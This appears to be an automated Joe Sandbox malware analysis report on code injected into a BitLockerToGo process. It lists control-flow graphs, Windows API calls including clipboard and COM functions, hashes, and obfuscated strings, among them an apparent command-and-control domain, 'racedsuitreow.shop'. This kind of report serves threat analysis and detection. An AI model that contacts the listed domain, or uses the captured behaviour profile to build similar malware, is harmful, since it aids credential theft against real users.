                                    control_flow_graph 427 296d1a0-296d1ab call 29a5b00 430 296d1b1-296d1c0 GetInputState call 299cf10 427->430 431 296d38e-296d390 ExitProcess 427->431 434 296d1c6-296d1f7 GetCurrentThreadId GetCurrentProcessId 430->434 435 296d389 call 29a6b30 430->435 436 296d226-296d24a 434->436 437 296d1f9 434->437 435->431 440 296d276-296d278 436->440 441 296d24c-296d24f 436->441 439 296d200-296d224 call 296d3a0 437->439 439->436 443 296d316-296d33f 440->443 444 296d27e-296d29b 440->444 442 296d250-296d274 call 296d430 441->442 442->440 450 296d376-296d37d call 296ed20 443->450 451 296d341 443->451 447 296d2c6-296d2ea 444->447 448 296d29d-296d29f 444->448 447->443 456 296d2ec-296d2ef 447->456 455 296d2a0-296d2c4 call 296d4c0 448->455 450->435 462 296d37f call 2972730 450->462 452 296d350-296d374 call 296d5a0 451->452 452->450 455->447 460 296d2f0-296d314 call 296d530 456->460 460->443 467 296d384 call 2970760 462->467 467->435
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.1873658386.0000000002960000.00000040.00000400.00020000.00000000.sdmp, Offset: 02960000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_2960000_BitLockerToGo.jbxd
                                    Similarity
                                    • API ID: CurrentProcess$ExitInputStateThread
                                    • String ID: "~ *
                                    • API String ID: 1029096631-992940167
                                    • Opcode ID: b8dbb767c950d2c2e83a75d2184f500b37771a969304dba2f1173320447f146d
                                    • Instruction ID: c5ffb7bd32b1011429e69fb483b32d8d51b7eafe3734cd443e74d0e397c8ca5a
                                    • Opcode Fuzzy Hash: b8dbb767c950d2c2e83a75d2184f500b37771a969304dba2f1173320447f146d
                                    • Instruction Fuzzy Hash: BF411774A0C3809BD301AF69D558A2EFBE6AF92709F588D0CE5D497251D33AD810CFA7

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 469 296f860-296f89d 470 296f8c6-296f9d4 469->470 471 296f89f 469->471 473 296fa06-296fa38 470->473 474 296f9d6 470->474 472 296f8a0-296f8c4 call 2971ca0 471->472 472->470 475 296fa3a 473->475 476 296fa69-296fa82 call 2970770 473->476 478 296f9e0-296fa04 call 2971db0 474->478 479 296fa40-296fa67 call 2971d30 475->479 487 296fb94-296fb96 476->487 488 296fa88-296faad 476->488 478->473 479->476 491 296fd62-296fd6c 487->491 489 296fad6-296fadf 488->489 490 296faaf 488->490 493 296fae0-296faea 489->493 492 296fab0-296fad4 call 2971e40 490->492 492->489 495 296faf1-296faf9 493->495 496 296faec-296faef 493->496 497 296fd52-296fd56 call 29a3e80 495->497 498 296faff-296fb21 495->498 496->493 496->495 506 296fd5b-296fd5e 497->506 500 296fb56-296fb61 498->500 501 296fb23 498->501 504 296fb63-296fb67 500->504 505 296fb9b 500->505 503 296fb30-296fb54 call 2971ec0 501->503 503->500 508 296fb77-296fb7b 504->508 509 296fb9d-296fb9f 505->509 506->491 511 296fd4a 508->511 513 296fb81-296fb88 508->513 510 296fba5-296fbe1 509->510 509->511 514 296fc16-296fc21 510->514 515 296fbe3 510->515 511->497 516 296fb8e 513->516 517 296fb8a-296fb8c 513->517 519 296fc54 514->519 520 296fc23-296fc2b 514->520 518 296fbf0-296fc14 call 2971f50 515->518 521 296fb70-296fb75 516->521 522 296fb90-296fb92 516->522 517->516 518->514 525 296fc56-296fc58 519->525 524 296fc37-296fc3b 520->524 521->508 521->509 522->521 524->511 527 296fc41-296fc48 524->527 525->511 528 296fc5e-296fc7e 525->528 531 296fc4e 527->531 532 296fc4a-296fc4c 527->532 529 296fca6-296fcad 528->529 530 296fc80-296fca4 call 2971fc0 528->530 534 296fce0-296fcec 529->534 535 296fcaf-296fcbc 529->535 530->529 536 296fc30-296fc35 531->536 537 296fc50-296fc52 531->537 532->531 540 296fd73-296fd78 534->540 539 296fcc7-296fccb 535->539 536->524 536->525 537->536 539->511 541 296fccd-296fcd4 539->541 540->497 542 296fcd6-296fcd8 541->542 543 296fcda 541->543 542->543 544 296fcc0-296fcc5 543->544 545 296fcdc-296fcde 543->545 544->539 546 296fcf1-296fcf3 544->546 545->544 546->511 547 296fcf5-296fd0b 546->547 547->540 548 296fd0d-296fd0f 547->548 549 296fd13-296fd16 548->549 550 296fd6d 549->550 551 296fd18-296fd38 call 2971870 549->551 550->540 554 296fd42-296fd48 551->554 555 296fd3a-296fd40 551->555 554->540 555->549 555->554
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.1873658386.0000000002960000.00000040.00000400.00020000.00000000.sdmp, Offset: 02960000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_2960000_BitLockerToGo.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: 0umRl5oIKMzHffGYQzHVGWScuWA_ow6b6hNt1JaFJOc-1727336821-0.0.1.1-/api$G!aq$rdqn$vh~j$}z,)
                                    • API String ID: 0-27367038
                                    • Opcode ID: 64155d54f55f175a7280e160aa0291dfb16cd604aa15fb0dc2661e29abb6bb8f
                                    • Instruction ID: 63116f0ef2e57a9da2d4daf47fd83846cfc5d9314429bdd212313a81efbfdac0
                                    • Opcode Fuzzy Hash: 64155d54f55f175a7280e160aa0291dfb16cd604aa15fb0dc2661e29abb6bb8f
                                    • Instruction Fuzzy Hash: 87D1AC7050C3818BC311DF28E49462EBBE6AF96748F580D5CE4D68B362D336D949CBA7

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 657 29a7130-29a7162 LdrInitializeThunk
                                    APIs
                                    • LdrInitializeThunk.NTDLL(029AA8AD,005C003F,00000006,?,?,00000018,;:54,?,?), ref: 029A715E
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.1873658386.0000000002960000.00000040.00000400.00020000.00000000.sdmp, Offset: 02960000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_2960000_BitLockerToGo.jbxd
                                    Similarity
                                    • API ID: InitializeThunk
                                    • String ID: ;:54
                                    • API String ID: 2994545307-2887251705
                                    • Opcode ID: b66ff63dfd389af1bc8afcc0025f999e8b2b47508af02e865142dda64173a8e3
                                    • Instruction ID: fb6f357373f259be8b0e83fffc5d2a3912a28e0da7d2036ce94b71e982b3a7e9
                                    • Opcode Fuzzy Hash: b66ff63dfd389af1bc8afcc0025f999e8b2b47508af02e865142dda64173a8e3
                                    • Instruction Fuzzy Hash: 76E0FE75908316AB9A09CF45C14444EFBE5BFC4714F11CC8DA4D867210D3B0AD46DF82

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 685 299fad0-299fb39 686 299fb3b 685->686 687 299fb7a-299fb9a 685->687 688 299fb40-299fb78 call 29a3a70 686->688 692 299fbac-299fc09 CoCreateInstance 687->692 693 299fba1 687->693 688->687 692->692 692->693 693->692
                                    APIs
                                    • CoCreateInstance.OLE32(029AECE0,00000000,00000001,029AECD0,00000000), ref: 0299FBFE
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.1873658386.0000000002960000.00000040.00000400.00020000.00000000.sdmp, Offset: 02960000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_2960000_BitLockerToGo.jbxd
                                    Similarity
                                    • API ID: CreateInstance
                                    • String ID:
                                    • API String ID: 542301482-0
                                    • Opcode ID: e71c766b730620d1312c5ed655dc3ef9b6c45f1c30a34bd5af48799e0175a00b
                                    • Instruction ID: a1bc4a984bb5007a7fc65c3839fc4bc715867510d8758a42a3b074a5d2a01129
                                    • Opcode Fuzzy Hash: e71c766b730620d1312c5ed655dc3ef9b6c45f1c30a34bd5af48799e0175a00b
                                    • Instruction Fuzzy Hash: 142126B045C384ABE3708F15C855B9BBBE8FB86719F40490CF5C89A281CBB19508CBA3

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 0 2972773-2972778 call 299fad0 2 297277d-29727b1 0->2 3 29727b3 2->3 4 2972800-2972878 2->4 5 29727c0-29727fe call 297b3f0 3->5 6 29728b1-29728c2 4->6 7 297287a 4->7 5->4 8 29728c4-29728cb 6->8 9 29728db-29728e3 6->9 11 2972880-29728af call 297b380 7->11 13 29728d0-29728d9 8->13 14 29728e5-29728e6 9->14 15 29728fb-2972908 9->15 11->6 13->9 13->13 18 29728f0-29728f9 14->18 19 297292b-2972933 15->19 20 297290a-2972911 15->20 18->15 18->18 22 2972935-2972936 19->22 23 297294b-2972a8f 19->23 21 2972920-2972929 20->21 21->19 21->21 24 2972940-2972949 22->24 25 2972a91 23->25 26 2972ae0-2972b1c 23->26 24->23 24->24 27 2972aa0-2972ade call 297b4f0 25->27 28 2972b51-2972b85 call 2970770 26->28 29 2972b1e-2972b1f 26->29 27->26 37 2972bb6-2972bc2 GetSystemDirectoryW 28->37 38 2972c65-2972c6b call 296caf0 28->38 39 2972be2-2972bfe 28->39 40 2972bb0 28->40 41 2972bd0-2972bd6 GetSystemDirectoryW 28->41 42 2972ba0-2972baf CoUninitialize 28->42 43 2972c4f-2972c58 call 2963c20 28->43 44 2972c6e-2972cbb call 2964720 28->44 45 2972b8c-2972b99 28->45 46 2972d1b-2972d23 call 299f170 28->46 47 2972d2a-2972d63 28->47 31 2972b20-2972b4f call 297b470 29->31 31->28 37->41 38->44 49 2972c05 39->49 50 2972c00-2972c03 39->50 41->39 43->38 66 2972d00-2972d14 call 2964870 44->66 67 2972cbd-2972cbf 44->67 45->38 45->42 45->43 45->44 45->46 45->47 46->37 46->38 46->39 46->40 46->41 46->42 46->43 46->44 46->45 46->47 52 2972d65 47->52 53 2972db0-2972df5 call 2964870 47->53 58 2972c06-2972c0e 49->58 50->49 50->58 60 2972d70-2972dae call 297b600 52->60 72 2972df7 53->72 73 2972e40-2972e77 call 2964870 53->73 63 2972c15 58->63 64 2972c10-2972c13 58->64 60->53 69 2972c16-2972c48 call 296cae0 call 29a0580 call 29a3e80 63->69 64->63 64->69 66->46 66->47 71 2972cc0-2972cfe call 297b570 67->71 69->38 69->42 69->43 69->44 69->46 69->47 71->66 77 2972e00-2972e3e call 297b680 72->77 84 2972ec0-2972fdf call 2964870 call 2973b80 call 2964cd0 call 296d610 call 2988d10 call 296dea0 call 296d610 call 2989420 call 296dea0 call 296d610 call 29896b0 call 296dea0 call 296d610 call 298bed0 call 298c720 call 298cb50 call 298f590 call 296dea0 call 296d610 call 298e740 call 296dea0 call 296d610 call 2991fe0 call 2998800 73->84 85 2972e79 73->85 77->73 142 2972fe6-2972fec call 2998980 84->142 143 2972fef-2973036 call 296dea0 CoUninitialize 84->143 88 2972e80-2972ebe call 297b700 85->88 88->84 142->143 148 297307a-29730a2 143->148 149 2973038 143->149 150 29730a4 148->150 151 29730ea-297316d 148->151 152 2973040-2973078 call 297b870 149->152 153 29730b0-29730e8 call 297b800 150->153 154 29731b0-29731ba 151->154 155 297316f 151->155 152->148 153->151 159 29731bc-29731ca 154->159 160 29731db-29731e3 154->160 158 2973170-29731ae call 297b770 155->158 158->154 164 29731d0-29731d9 159->164 165 29731e5-29731e6 160->165 166 29731fb-2973205 160->166 164->160 164->164 170 29731f0-29731f9 165->170 167 2973207-2973212 166->167 168 297322d 166->168 171 2973220-2973229 167->171 172 2973234-297323c 168->172 170->166 170->170 171->171 173 297322b 171->173 174 297323e-297323f 172->174 175 297324b-2973255 172->175 173->172 176 2973240-2973249 174->176 177 2973257-297325b 175->177 178 297326b-2973277 175->178 176->175 176->176 179 2973260-2973269 177->179 180 2973291-29733c7 178->180 181 2973279-297327b 178->181 179->178 179->179 182 2973401-297342f 180->182 183 29733c9 180->183 184 2973280-297328d 181->184 186 2973431 182->186 187 297346b-2973492 call 2970770 182->187 185 29733d0-29733ff call 297b980 183->185 184->184 188 297328f 184->188 185->182 190 2973440-2973469 call 297b8f0 186->190 188->180 190->187
                                    APIs
                                    • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 02972BBC
                                    • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 02972BD6
                                    • CoUninitialize.OLE32 ref: 02972FFB
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.1873658386.0000000002960000.00000040.00000400.00020000.00000000.sdmp, Offset: 02960000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_2960000_BitLockerToGo.jbxd
                                    Similarity
                                    • API ID: DirectorySystem$Uninitialize
                                    • String ID: "PWV$"TW^$$#$.$FB7686265FD290D4D6F0733735DE7FE6$G1}q$T1S7$_./^$racedsuitreow.shop$xr
                                    • API String ID: 1329415092-255722275
                                    • Opcode ID: 3087f2a22d49a7ee739dd95a3e031ea11603e7b58c8137848ad3ec5c57de2ee7
                                    • Instruction ID: 67e12d7cfe2cefec47582f59b81521a50315af7b1b0d79ba7f8d859c0753609c
                                    • Opcode Fuzzy Hash: 3087f2a22d49a7ee739dd95a3e031ea11603e7b58c8137848ad3ec5c57de2ee7
                                    • Instruction Fuzzy Hash: 29624AB050A3C0DAE7319F149854BEFBBE5BF9A308F08095DE4C95B242D7369505CBA7

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 651 29a3e10-29a3e32 652 29a3e66-29a3e7d RtlAllocateHeap 651->652 653 29a3e34 651->653 654 29a3e40-29a3e64 call 29a6f90 653->654 654->652
                                    APIs
                                    • RtlAllocateHeap.NTDLL(?,00000000,?), ref: 029A3E73
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.1873658386.0000000002960000.00000040.00000400.00020000.00000000.sdmp, Offset: 02960000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_2960000_BitLockerToGo.jbxd
                                    Similarity
                                    • API ID: AllocateHeap
                                    • String ID: EZ[X
                                    • API String ID: 1279760036-3495592236
                                    • Opcode ID: 602287bca5418f22144395a9b02488c6a0fb21a429706db14a81590023af5f30
                                    • Instruction ID: f86a51f9ef0f78545516099b68c3cb5a65c69b49155e9fec3c2cd0427898a840
                                    • Opcode Fuzzy Hash: 602287bca5418f22144395a9b02488c6a0fb21a429706db14a81590023af5f30
                                    • Instruction Fuzzy Hash: F0F01D7050D2409BD301AB18E954A0EFBF5EF96A04F548C6CE4C497261C336E864CBA7

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 701 29a6058-29a60a2 702 29a60d6-29a610a LoadLibraryExW 701->702 703 29a60a4 701->703 704 29a60b0-29a60d4 call 29a6f20 703->704 704->702
                                    APIs
                                    • LoadLibraryExW.KERNEL32(C944CB51,00000000,00000800), ref: 029A60E2
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.1873658386.0000000002960000.00000040.00000400.00020000.00000000.sdmp, Offset: 02960000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_2960000_BitLockerToGo.jbxd
                                    Similarity
                                    • API ID: LibraryLoad
                                    • String ID:
                                    • API String ID: 1029625771-0
                                    • Opcode ID: bd823f1e9f2ec0e6d29c87f408f610a9dd3fd7ae89866788c1ba6cc57e784684
                                    • Instruction ID: 41ba625a65f5adf5f992191455909e1d2ecc2bed0b8aa8db9bace1794287ceea
                                    • Opcode Fuzzy Hash: bd823f1e9f2ec0e6d29c87f408f610a9dd3fd7ae89866788c1ba6cc57e784684
                                    • Instruction Fuzzy Hash: 6F01A57A11C3809FD702EF29D864A1EBBE9AB95344F688D1CE0C4C7251C334AA518F97

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 694 299fc10-299fc54 695 299fc8b-299fcac SysAllocString 694->695 696 299fc56 694->696 698 299fcb0-299fcb2 695->698 697 299fc60-299fc89 call 29a3b00 696->697 697->695
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.1873658386.0000000002960000.00000040.00000400.00020000.00000000.sdmp, Offset: 02960000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_2960000_BitLockerToGo.jbxd
                                    Similarity
                                    • API ID: AllocString
                                    • String ID:
                                    • API String ID: 2525500382-0
                                    • Opcode ID: 6279315937694d69f3c4ae87e708e6d382164fd3eba8b9b7089e8c0744291cf7
                                    • Instruction ID: a1eedfa3c01686e6b0ad0043a89848e39be55e45558fe310aab33645b94ddb68
                                    • Opcode Fuzzy Hash: 6279315937694d69f3c4ae87e708e6d382164fd3eba8b9b7089e8c0744291cf7
                                    • Instruction Fuzzy Hash: 9C0102B4009385ABE300CB25D584A1FBFE5BB9A359F44990CF8C89A662C774D441CF96

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 707 29a3ea8-29a3ead 708 29a3f12-29a3f18 707->708 709 29a3eb4-29a3ecb 707->709 710 29a3ecd-29a3ecf 709->710 711 29a3ef4-29a3f0a RtlFreeHeap 709->711 712 29a3ed0-29a3ef2 call 29a7020 710->712 711->708 712->711
                                    APIs
                                    • RtlFreeHeap.NTDLL(?,00000000), ref: 029A3EFF
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.1873658386.0000000002960000.00000040.00000400.00020000.00000000.sdmp, Offset: 02960000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_2960000_BitLockerToGo.jbxd
                                    Similarity
                                    • API ID: FreeHeap
                                    • String ID:
                                    • API String ID: 3298025750-0
                                    • Opcode ID: 95fc0d2ba5595f5bcaab145b3455858d58b2a39f55d00f15fa815784b6c2ed26
                                    • Instruction ID: 59985a53fd65f163d170b0458989d00a8f8e9e4c92447282b4714488b1e42648
                                    • Opcode Fuzzy Hash: 95fc0d2ba5595f5bcaab145b3455858d58b2a39f55d00f15fa815784b6c2ed26
                                    • Instruction Fuzzy Hash: 21018C35E44244EBCB028F88D455AADFB75EF06311F154592E824A7241C334AA20CB94

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 715 2972751-2972769 CoInitializeSecurity
                                    APIs
                                    • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 02972763
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.1873658386.0000000002960000.00000040.00000400.00020000.00000000.sdmp, Offset: 02960000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_2960000_BitLockerToGo.jbxd
                                    Similarity
                                    • API ID: InitializeSecurity
                                    • String ID:
                                    • API String ID: 640775948-0
                                    • Opcode ID: be655998266b22090a6b727c84a6d13227c5f661ffb1a949811b11210538f0af
                                    • Instruction ID: 419ba5e71ceceb06bdb4e6b708f30ae1db274a4f7add1deecde85db4344c4fdb
                                    • Opcode Fuzzy Hash: be655998266b22090a6b727c84a6d13227c5f661ffb1a949811b11210538f0af
                                    • Instruction Fuzzy Hash: D3D092307CC304B6F9710A0CAD1BF643110AB02F32F300700F3667C4C499E23120861D
                                    APIs
                                    • CoInitialize.OLE32(00000000), ref: 02972741
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.1873658386.0000000002960000.00000040.00000400.00020000.00000000.sdmp, Offset: 02960000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_2960000_BitLockerToGo.jbxd
                                    Similarity
                                    • API ID: Initialize
                                    • String ID:
                                    • API String ID: 2538663250-0
                                    • Opcode ID: bc07845a66b7b397d9267a31ac253d5a221545e8642a53ebcb7cd5afc582a721
                                    • Instruction ID: ed97c90ac1c9c2c9ee2240c398594e9635d571ab3a759ba4ba5a524b9f683e5c
                                    • Opcode Fuzzy Hash: bc07845a66b7b397d9267a31ac253d5a221545e8642a53ebcb7cd5afc582a721
                                    • Instruction Fuzzy Hash: 4AC08C20898208A7E2102B2DAD0AF62392C9703766F800322F9A4804C16E521524C2F2
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.1873658386.0000000002960000.00000040.00000400.00020000.00000000.sdmp, Offset: 02960000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_2960000_BitLockerToGo.jbxd
                                    Similarity
                                    • API ID: InitializeThunk
                                    • String ID: !"#$#"! $()*+$456p$DEFG$HIJK$LMNO$ONML$PQRS$Tu59$X$X$XYZ[$\]^_$`abc$cba`$efg`$hijk$k-./$lmn($pqrs$tuvw$w123$xyz{${zy?
                                    • API String ID: 2994545307-861201060
                                    • Opcode ID: 67cdec164f64d4a776812bcb3f214aeb9e3aa1530de3411494a7910192865bdf
                                    • Instruction ID: 1e97d1f9ee734266b7dc2a35934627045a62ee8b680654e718ec78e9670ec360
                                    • Opcode Fuzzy Hash: 67cdec164f64d4a776812bcb3f214aeb9e3aa1530de3411494a7910192865bdf
                                    • Instruction Fuzzy Hash: 05A268B16083819BD730DF14C890BAFBBE5BFC5744F54892CE6C99B291E7749808CB96
                                    APIs
                                    • LoadLibraryExW.KERNEL32(C956CB53,00000000,00000800), ref: 02992E69
                                    • FreeLibrary.KERNEL32(?), ref: 02992F77
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.1873658386.0000000002960000.00000040.00000400.00020000.00000000.sdmp, Offset: 02960000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_2960000_BitLockerToGo.jbxd
                                    Similarity
                                    • API ID: Library$FreeLoad
                                    • String ID: %<?2$::!8$=e(($?sj_$JhZr$KmN#$R" *$qulf$t`{c$|_+&
                                    • API String ID: 534179979-2662572573
                                    • Opcode ID: 2499319f81fa957968451af19dddb56a0ec938f72d1b5b9cd31134938eb8c93a
                                    • Instruction ID: 7db168fcf57c2a25f3d41e2ba10313057a9d4b6d8b9ae9262eb9b6a80ca61aaa
                                    • Opcode Fuzzy Hash: 2499319f81fa957968451af19dddb56a0ec938f72d1b5b9cd31134938eb8c93a
                                    • Instruction Fuzzy Hash: A2927F70805F819AEB21CF39C850BA7BBE5AF1B315F04099DD8EB8B282D735A445CF65
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.1873658386.0000000002960000.00000040.00000400.00020000.00000000.sdmp, Offset: 02960000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_2960000_BitLockerToGo.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: 4`[b$NDNC$Ox$Sx$c$efg`$mmeh$tE$v|v{
                                    • API String ID: 0-231150121
                                    • Opcode ID: eb7087394e4b2893ebda581de5293e2e6665ba7ed9092768f36cd8e291b71e3b
                                    • Instruction ID: b917540695b99ab6dbc27240470f821be3c770488132b52107f8186a65214692
                                    • Opcode Fuzzy Hash: eb7087394e4b2893ebda581de5293e2e6665ba7ed9092768f36cd8e291b71e3b
                                    • Instruction Fuzzy Hash: CF62ACB4D00219CFDB20DFA8D890BAEBBB1FF46304F5445A9E855AB381D730A955CF91
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.1873658386.0000000002960000.00000040.00000400.00020000.00000000.sdmp, Offset: 02960000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_2960000_BitLockerToGo.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: 47$8k9i$K_$UZ$V^
                                    • API String ID: 0-2523940364
                                    • Opcode ID: 90c1d912638f65897d26219bf25046e13566ac932821817c347fd72032097a97
                                    • Instruction ID: 426ce49e072157e8801494ba06dd42355f06a91cc786c3c5798bfa56678985d9
                                    • Opcode Fuzzy Hash: 90c1d912638f65897d26219bf25046e13566ac932821817c347fd72032097a97
                                    • Instruction Fuzzy Hash: DB022DB0409380ABD310EF55DA90A2BBBF5EF86B48F484D1CF4899B251E375D905CBA7
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.1873658386.0000000002960000.00000040.00000400.00020000.00000000.sdmp, Offset: 02960000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_2960000_BitLockerToGo.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: -$0123456789ABCDEFXP$0123456789abcdefxp$@$gfff$gfff$gfff
                                    • API String ID: 0-2517803157
                                    • Opcode ID: 030d39a50aeccfa29eec559d7868275b285e1c1b16a2d732161a0a65a7b7a5dc
                                    • Instruction ID: 37f5b506763d8f21f7366424e408e5ccfb559f2d5d5f3b5473a164b5166bd56a
                                    • Opcode Fuzzy Hash: 030d39a50aeccfa29eec559d7868275b285e1c1b16a2d732161a0a65a7b7a5dc
                                    • Instruction Fuzzy Hash: 22D2D371A083518FD714CF28C49877ABBE2AFC9714F188A6DF8998B391D374D945CB82
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.1873658386.0000000002960000.00000040.00000400.00020000.00000000.sdmp, Offset: 02960000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_2960000_BitLockerToGo.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: 4`[b$NDNC$efg`$mmeh$tE$v|v{$KM
                                    • API String ID: 0-1041208609
                                    • Opcode ID: 97a4556d6c4e76f065b96010e2fbf1a4af1fe2d2fbeb5172822c2eb448cab821
                                    • Instruction ID: 1a3f5c90110141dad103e7fd07e7761d6a8dd6b804e6d47e982d9d2cf21a886f
                                    • Opcode Fuzzy Hash: 97a4556d6c4e76f065b96010e2fbf1a4af1fe2d2fbeb5172822c2eb448cab821
                                    • Instruction Fuzzy Hash: 2A22CFB4D00216CFDB20DF94C890BBEB7B1FF46304F584599E885AB381D735AA51CBA6
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.1873658386.0000000002960000.00000040.00000400.00020000.00000000.sdmp, Offset: 02960000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_2960000_BitLockerToGo.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: 4`[b$NDNC$efg`$mmeh$tE$v|v{$KM
                                    • API String ID: 0-1041208609
                                    • Opcode ID: 765bd77a14c35f15992e919c6fd4931a10423e12ebe98aee7c778f37200f3349
                                    • Instruction ID: cf088eb88775b59b1b0ee2a78902b29af4c59ad215506c1aba5b45fdac8aa847
                                    • Opcode Fuzzy Hash: 765bd77a14c35f15992e919c6fd4931a10423e12ebe98aee7c778f37200f3349
                                    • Instruction Fuzzy Hash: 8022CFB4D00216CFDB20DF94C890BBEB7B1FF46304F584599E885AB381D734AA51CBA6
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.1873658386.0000000002960000.00000040.00000400.00020000.00000000.sdmp, Offset: 02960000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_2960000_BitLockerToGo.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: 4`[b$4`[b$JC$efg`$efg`$~K$~v
                                    • API String ID: 0-2068420110
                                    • Opcode ID: e509a0e467e13d372fd3316cc7cde21831c2dff02f39d79419bcf9f98d6ef333
                                    • Instruction ID: 7c4454e170e11177d04643367c6091bca608d6d32511ac89bce391f62ae01b39
                                    • Opcode Fuzzy Hash: e509a0e467e13d372fd3316cc7cde21831c2dff02f39d79419bcf9f98d6ef333
                                    • Instruction Fuzzy Hash: 14D164B190C340ABE720EF64E880B6EBBF5FB86344F548D2DE2C89A251D735D454CB62
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.1873658386.0000000002960000.00000040.00000400.00020000.00000000.sdmp, Offset: 02960000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_2960000_BitLockerToGo.jbxd
                                    Similarity
                                    • API ID: Clipboard$Global$CloseDataLockLongOpenUnlockWindow
                                    • String ID:
                                    • API String ID: 2832541153-0
                                    • Opcode ID: 013e15c372a14743da458870d51f28d3b3dc5b2f89df1eddf67ee99df6cfd4e7
                                    • Instruction ID: ea5bd75440f1516568b4d16d91a4ade281d595c95d95f1d3a12f0052f385a9e0
                                    • Opcode Fuzzy Hash: 013e15c372a14743da458870d51f28d3b3dc5b2f89df1eddf67ee99df6cfd4e7
                                    • Instruction Fuzzy Hash: 99414CB19083868EDF10ABBCD9487BEBFB0AB56220F044A6DE4E1A72D1D3354555C7A3
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.1873658386.0000000002960000.00000040.00000400.00020000.00000000.sdmp, Offset: 02960000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_2960000_BitLockerToGo.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: 4`[b$4`[b$4`[b$PcR}$efg`$efg`
                                    • API String ID: 0-176531621
                                    • Opcode ID: 812159f3e8cd00188689057f3d068b4c3ee28fc1bba339adfb68e243f69789ea
                                    • Instruction ID: fc00d41585c966ff431fec09bc172f402b36105856526587807bbad1ffe15438
                                    • Opcode Fuzzy Hash: 812159f3e8cd00188689057f3d068b4c3ee28fc1bba339adfb68e243f69789ea
                                    • Instruction Fuzzy Hash: 9532C075D0020ACFCB20DFA8C990ABEB7B2FF49344F29845AD845BB361D7359951CBA0
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.1873658386.0000000002960000.00000040.00000400.00020000.00000000.sdmp, Offset: 02960000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_2960000_BitLockerToGo.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: 0$0$0$@$i
                                    • API String ID: 0-3124195287
                                    • Opcode ID: 2ea22e46caff4318fec955fb584b43b2a5e62d7ba2c4a4037c7743daf1882aa5
